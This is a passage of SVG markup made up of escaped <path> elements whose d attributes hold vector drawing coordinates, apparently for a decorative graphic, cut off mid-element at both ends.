d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path 